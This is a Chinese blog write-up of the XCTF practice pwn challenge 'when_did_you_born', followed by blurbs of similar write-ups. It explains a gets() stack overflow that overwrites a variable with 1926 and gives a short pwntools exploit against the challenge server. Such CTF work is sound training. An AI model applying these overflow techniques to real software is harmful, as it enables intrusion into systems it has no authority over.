[攻防世界 pwn]——when_did_you_born

最新推荐文章于 2021-02-27 10:51:47 发布

原创最新推荐文章于 2021-02-27 10:51:47 发布 · 191 阅读

0 ·

CC 4.0 BY-SA版权

攻防世界专栏收录该内容

23 篇文章

订阅专栏

该博客介绍了CTF比赛中的一道题目，涉及64位系统的checksec和栈溢出漏洞利用。通过IDA分析，只要在输入时将变量v5设置为1926，然后利用gets函数导致栈溢出来改变v4的值，即可成功解决挑战。提供的exploit代码展示了如何发送特定的payload来完成这一操作。

[攻防世界 pwn]——when_did_you_born

题目地址: https://adworld.xctf.org.cn/
题目:

checksec看下 64位

IDA中，只要v5最初不是1926,之后改为1926就可以了。利用gets栈溢出就好v4与v5相差0x20 -0x18

exploit

from pwn import *
#p = process("./pwn")
p = remote("111.200.241.244",58101)
p.sendlineafter("What's Your Birth?\n", '2001')
payload = 'a' * 8 + p64(0x786)
p.sendlineafter("What's Your Name?", payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Y-peak

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

攻防世界 when_did_you_born

09-28

320

1.题目 2.IDA反汇编C程序 3.程序流程分析首先输入Birth，如果Birth==1926直接退出；否则，输入Name，这时，判断Birth是否==1926.等于则get flag。很明显，输入名字就是专门为我们提供溢出点的。两个变量的位置如下图： 0x20 - 0x18 = 0x8 也就是说name和birth之间间距8个单元。exp如下 from pwn import * #io = process('./when_did_you_born') io = remo

攻防世界pwn新手练习（when_did_you_born）

BurYiA的博客

09-16

665

when_did_you_born ok 多余的话就不继续累赘了昂，直接上手程序同上次一样开了NX(堆栈不可执行)和CANNARY(栈保护)

参与评论您还未登录，请先登录后发表或查看评论

[CTF-PWN]攻防世界新手村-when_did_you_born[wp]

murongxuege的博客

09-29

706

事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候，从头到尾刷一遍题，总结思路。题目分析开启场景后，服务端会开启对应的端口，并在端口上部署和附件相同的ELF二进制可执行文件，我们要做的就是下载附件并在本地进行反汇编，反编译等操作分析程序漏洞，从而利用漏洞获取题目的flag。从描述中可以看出当前程序是要进行年龄的输入操作的，有输入操作，还是在新手村，那么大概率是gets()等C函数输入漏洞，进一步猜测是普通的内存地址覆盖的题。 che

[PWN](攻防世界)when_did_you_born

ljh15937的博客

09-17

252

分析程序漏洞通过 checksec 获取程序的基本信息 64位小端序开启了Canary，使用了栈不可执行技术使用 IDA Pro 对程序进行静态分析需要在第二次输入名字时覆盖第一次输入的年龄使用 GDB 动态调试程序可以发现第二次输入的名字就在第一次输入的年龄的前面，可以轻松将其覆盖成 1926 利用程序 from pwn import * context(arch = 'amd64') context(log_level = 'DEBUG') contex

攻防世界 - pwn - when_did_you_born

qq726232111的博客

03-16

277

A、程序分析 1、gets( 0 , rbp-20h ) -> rbp-20h 为缓冲区起始地址 2、[rbp-18h] ==786h -> 执行cat flag B、利用分析 1、构造payload通过gets()覆盖rbp-18h的内容 payload: 20h-19h(填充数据) + 18h-15h(0x0000786,判断条件) ...

攻防世界-pwn when_did_you_born（栈覆盖）

菜的只能随便写写博客

08-10

1515

0x01 拿到文件之后，先检查文件的基本信息文件信息 64bit elf可执行文件无PIE保护 0x02 执行文件文件之中有两个输入，第一个输入有回显 0x03 IDA静态分析可以看出获取flag需要用到v5的值，首先需要v5不等于1926，进入else这个块之中，然后又需要v5等于1926才能获取flag，就产生了矛盾。结合程序有两个输入，可以考...

攻防世界pwn when_did_you_born（栈溢出）

Haowill的博客

04-09

606

攻防世界pwn when_did_you_born（栈溢出）这是我第一次写博客，希望帮助到大家，感谢大家的支持。 pwn题做题步骤相信做这道题的同学们都是新手，或者是老手回来刷题。所以我这里会简单介绍我做pwn题的方法。一、下载程序到电脑这个就是下载到电脑里的样子。二、判断程序类型这个程序没有.exe后缀，所以它不是window的，它是linux的。在我们学习pwn的初期都是linux...

攻防世界-wp-PWN-新手区-4-when_did_you_born

Scorpio_m7

02-18

1261

题目来源： CGCTF 题目描述：只要知道你的年龄就能获得flag，但菜鸡发现无论如何输入都不正确，怎么办题目场景： 111.198.29.45:47091 题目附件： 24ac28ef281b4b6caab44d6d52b17491 题目思路：这是一道很简单的栈溢出的题，当然首先你得懂函数调用时栈的原理，你还得学会通过pwntools编写简单的Python脚本，还得懂点Linux运行的机制、懂点IDA。栈溢出指的是程序向栈中某个变量中写入的字节数超过了这个变量本身所申请的字节数，因而导致与其相邻的

攻防世界pwn新手练习区-when_did_you_born

优快云_sunrise的博客

08-26

359

when_did_you_born查看基本信息并运行文件在IDA中分析查看基本信息并运行文件查看文件类型： file when_did_you_born 查看保护： checksec --file=when_did_you_born 运行文件：./when_did_you_born 在IDA中分析文件64位，将其拖入64位ida中。按 ...

攻防世界_pwn_when_did_you_born(萌新版)

TedLau的博客

02-24

301

首发于鄙人博客：传送门 0x00 前言省略file checksec，这个题的意思就是让我们输入的第二个值覆盖并改变我们输入的第一个值。 0x10 步骤 0x11 main函数在main函数中我们可以发现题目要求我们输入Birth，若我们输入的值为1926，那么程序便会直接退出，若我们输入的不是1926，那么就会进入else中，而在else中，如果我们想cat flag，那么...

pwn when_did_you_born

doudoudedi

06-08

601

今天被一道被一道web给虐暴了自闭中~~~~~ 所以我做到pwn来缓缓用ida打开只要v5=1926 就可以看flag 但按照前面的逻辑不可以等于所以就涉及到了溢出 gets()这个很普遍了吧直接算出偏移为8 然后就上exp咯 from pwn import * p=remote('111.198.29.45',56377) payload='a'*8+p64(1926) p.recvunt...

when_did_you_born--writeup

ATFWUS的博客

03-01

698

文件下载地址：链接：https://pan.baidu.com/s/1eT_oVeEKPts8Lw2P0nDEnw 提取码：1axx 0x01.分析 checksec: 64位程序，开启了堆栈保护和栈不可执行。查看源码：理清一下流程，先要输入v5，第一次不能输入1926，否则会退出，然后第二次输入名字，然后如果v5等于1926就直接得到flag，第二次输入的时候使用了g...

when_did_you_born 栈溢出简单利用

zyh18851473527的博客

08-05

643

直接放到IDA里看下：显而易见只要v5=1926，就可以看flag。但按照前面的逻辑不可以等于所以就涉及到了溢出。gets函数溢出，这道题关键v5一开始不为1926，后面必须是1926，所以通过栈可以知道，用v4覆盖v5 下面利用缓冲区溢出，先输入v4字符串覆盖空间，然后再给v5赋值1926就好了，试试看，从ebp的偏移可以看出来v4距离v5需要覆盖8个字节这样就得到flag啦 ...

Nepire的pwn入门学习之旅——（一）

Nepire的博客

02-03

2260

欢迎大家来到Nepire的pwn入门，本系列主要是通过CTF中pwn题的各种类型的解题过程来学习pwn相关的知识，让我们在pwn的世界沦陷吧呜喵~ 这次我要讲的是南邮CTF里的pwn50—When did you born？这是我最初做出来的几题pwn之一，算是很基础的pwn题,，所以让我们从这题开始入门吧~ 题目 nc ctf.acdxvfsvd.net 1926 ...

攻防世界XCTF-Pwn入门11题解题报告

ailx10

03-15

1895

Pwn是CTF中至关重要的项目，一般来说都是Linux二进制题目，零基础的同学可以看《程序员的自我修养》，主要题型包括：缓冲区溢出、Return to Libc、格式化字符串、PLT GOT等。攻防世界XCFT刷题信息汇总如下：攻防世界XCTF黑客笔记刷题记录～第一题：level0解题报告：首先看看这个程序是啥呗，哦64位Linux可执行程序：IDA看看逻辑，输出一个hello world然后就...

cgctf when_did_you_born 栈溢出简单利用

ditto的博客

12-22

2644

拿到题目，先checksec下，看下防护措施：没有开启PIE。直接放到IDA里看下：有些变量名为了方便看，我已经修改过了。图中箭头处即是溢出点。分析下第一次输入overflowme，如果等于1926就会退出，但是想要拿到flag，就需要overflowme的值为1926，那就很明显了，第一次输入的时候随便输个数只要不是1926就行，第二次输入v4 这个数组的时候，利用缓冲区溢出，将o...

攻防世界 pwn

清霂的博客

02-02

772

目录1.get_shell2.when_did_you_born3.hello_pwn4.level05.level26.cgpwn2 1.get_shell nc连接题连接后ls | cat flag 2.when_did_you_born file checksec 有canary保护，不能栈溢出 ida64 先输入v5,v5不能等于1926。再输入v4，注意有gets函数，不限制输入，但无法溢出，点进去v4,v5 发现var_18是v5，var_20是v4，那么可以输入v4时将v5的值覆盖为19

[攻防世界 pwn]——guess_num

Y_peak的博客

02-19

1563

[攻防世界 pwn]——guess_num15 [攻防世界 pwn]——level0 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下,开启了NX, canary, PIE 好家伙在IDA中发现我们只要利用gets函数将seed[0]给覆盖掉就可以了, 间距为0x20 用C语言写个小demo #include <stdio.h> #include <stdlib.h> int main() { int n, b;

[攻防世界 pwn]——monkey

Y_peak的博客

02-27

1061

[攻防世界 pwn]——monkey 题目地址：https://adworld.xctf.org.cn/ 题目：额，怎么说呢这道题。checksec没什么大不了的但是再IDA中就懵了，好大呀。好多文件。进入mian函数，也没有看很明白。准备运行程序看看到底是干什么的，帮助分析一下输入尝试输入aaaa，发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以，但是有的命令可以有的不可以在IDA中查看一下字符串，因为它可以输入的字

攻防世界pwn题目int_overflow